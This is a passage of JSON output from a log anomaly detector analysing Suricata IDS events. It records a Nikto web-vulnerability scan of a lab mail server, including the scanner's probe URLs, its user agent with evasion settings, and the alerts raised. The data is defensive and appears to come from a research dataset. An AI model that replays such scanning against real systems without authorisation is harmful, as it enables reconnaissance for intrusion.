"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46888, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":287028353316318,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 287028353316318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80", "/parser/model/time": 1583349514.27886, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46890, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.279049, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1745783930633893,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46890, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1745783930633893,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1745783930633893, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80", "/parser/model/time": 1583349514.285211, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46892, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.koi8-r", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.285927, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":899997495875252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46892, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":899997495875252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 899997495875252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46894 -> 192.168.10.154:80", "/parser/model/time": 1583349514.287568, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46894, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46894 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", 